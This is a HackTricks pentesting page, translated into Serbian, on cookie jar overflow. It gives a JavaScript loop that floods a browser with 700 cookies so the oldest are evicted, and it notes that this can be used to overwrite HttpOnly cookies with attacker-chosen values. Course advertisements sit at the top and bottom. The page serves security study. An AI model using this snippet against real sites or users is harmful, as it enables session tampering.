hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
2024-02-10 13:11:20 +00:00

3.2 KiB

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Browseri imaju ograničenje broja kolačića koje mogu da čuvaju za jednu stranicu. Zatim, ako iz nekog razloga želite da učinite kolačić nevidljivim, možete preplaviti posudu za kolačiće jer će najstariji biti obrisani pre ostalih:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Primetite da kolačići treće strane koji upućuju na drugu domenu neće biti prebrisani.

{% hint style="danger" %} Ovaj napad se takođe može koristiti za prebrisavanje kolačića sa HttpOnly oznakom, jer ga možete obrisati i zatim ponovo postaviti sa željenom vrednošću.

Proverite to u ovom postu sa laboratorijskim vežbama. {% endhint %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: